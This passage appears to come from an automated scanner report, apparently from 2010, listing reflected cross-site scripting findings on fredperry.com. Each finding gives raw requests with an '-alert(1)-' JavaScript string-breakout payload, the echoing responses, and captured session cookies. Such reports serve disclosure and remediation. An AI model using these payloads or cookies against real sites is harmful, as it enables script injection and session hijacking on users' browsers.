...[SNIP]...

1.74. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 288b4"-alert(1)-"8dbdc0fd791 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids288b4"-alert(1)-"8dbdc0fd791/my-first-fred-perry-shirt-overview/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ndi6tjig427j9ttkm97l8sv4g2; expires=Tue, 09-Nov-2010 17:19:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids288b4"-alert(1)-"8dbdc0fd791/my-first-fred-perry-shirt-overview/");
//]]>
...[SNIP]...

1.75. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cfd0"-alert(1)-"3724550e2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/my-first-fred-perry-shirt-overview9cfd0"-alert(1)-"3724550e2d6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ebbbjs2q6b6v1n8qrime7tb331; expires=Tue, 09-Nov-2010 17:19:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/my-first-fred-perry-shirt-overview9cfd0"-alert(1)-"3724550e2d6/");
//]]>
...[SNIP]...

1.76. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c166e"-alert(1)-"1986b134245 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/my-first-fred-perry-shirt-overview/?c166e"-alert(1)-"1986b134245=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1km5s4mm48jq61sf43il38u3s0; expires=Tue, 09-Nov-2010 17:18:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> My Firs
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/my-first-fred-perry-shirt-overview/?c166e"-alert(1)-"1986b134245=1");
//]]>
...[SNIP]...

1.77. http://www.fredperry.com/limited-edition/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b402"-alert(1)-"7cd71f3fd4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition1b402"-alert(1)-"7cd71f3fd4a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mcf7qrdktlf5aa5olcbmpu7l76; expires=Tue, 09-Nov-2010 17:05:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1b402"-alert(1)-"7cd71f3fd4a/");
//]]>
...[SNIP]...

1.78. http://www.fredperry.com/limited-edition/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7777c"-alert(1)-"313f3d97d63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/?7777c"-alert(1)-"313f3d97d63=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9s8uribp858p0bhp2ltgluj547; expires=Tue, 09-Nov-2010 17:04:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Limited
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/?7777c"-alert(1)-"313f3d97d63=1");
//]]>
...[SNIP]...

1.79. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1808"-alert(1)-"761be49e7f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionb1808"-alert(1)-"761be49e7f3/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r7of708qtgn1vt8bnn8uboqkk2; expires=Tue, 09-Nov-2010 17:05:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionb1808"-alert(1)-"761be49e7f3/men/");
//]]>
...[SNIP]...

1.80. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 988e5"-alert(1)-"b11ab3c0675 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men988e5"-alert(1)-"b11ab3c0675/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hu1d1s8la6ui695fjj2imvb9n5; expires=Tue, 09-Nov-2010 17:06:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men988e5"-alert(1)-"b11ab3c0675/");
//]]>
...[SNIP]...

1.81. http://www.fredperry.com/limited-edition/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64480"-alert(1)-"2f0f4002ef1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/?64480"-alert(1)-"2f0f4002ef1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ooj8qcigou1hp2bm63imobtkt0; expires=Tue, 09-Nov-2010 17:05:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's L
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/?64480"-alert(1)-"2f0f4002ef1=1");
//]]>
...[SNIP]...

1.82. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aebc"-alert(1)-"8415b8659b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition6aebc"-alert(1)-"8415b8659b8/men/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t572mchn82lsgdjpraivc9hmj7; expires=Tue, 09-Nov-2010 17:13:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition6aebc"-alert(1)-"8415b8659b8/men/accessories/");
//]]>
...[SNIP]...

1.83. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1880"-alert(1)-"89b8cefdcb5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menf1880"-alert(1)-"89b8cefdcb5/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l7gmp8pmt6tvlpnvuprf1qioh3; expires=Tue, 09-Nov-2010 17:14:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menf1880"-alert(1)-"89b8cefdcb5/accessories/");
//]]>
...[SNIP]...

1.84. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bdf6"-alert(1)-"0c2e6e325d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/accessories7bdf6"-alert(1)-"0c2e6e325d1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5ou6pdoglafg1dha16j5t94qk7; expires=Tue, 09-Nov-2010 17:14:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/accessories7bdf6"-alert(1)-"0c2e6e325d1/");
//]]>
...[SNIP]...

1.85. http://www.fredperry.com/limited-edition/men/accessories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af85e"-alert(1)-"f0ac6225e38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/accessories/?af85e"-alert(1)-"f0ac6225e38=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lphu3bnnj344ar3vk8j04vjlo7; expires=Tue, 09-Nov-2010 17:12:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/accessories/?af85e"-alert(1)-"f0ac6225e38=1");
//]]>
...[SNIP]...

1.86. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7520f"-alert(1)-"65db163a491 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition7520f"-alert(1)-"65db163a491/men/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fba8t0ar5ln3ls253ccb9o12v2; expires=Tue, 09-Nov-2010 17:11:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition7520f"-alert(1)-"65db163a491/men/bags/");
//]]>
...[SNIP]...

1.87. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ca63"-alert(1)-"8f92cbce3aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men7ca63"-alert(1)-"8f92cbce3aa/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
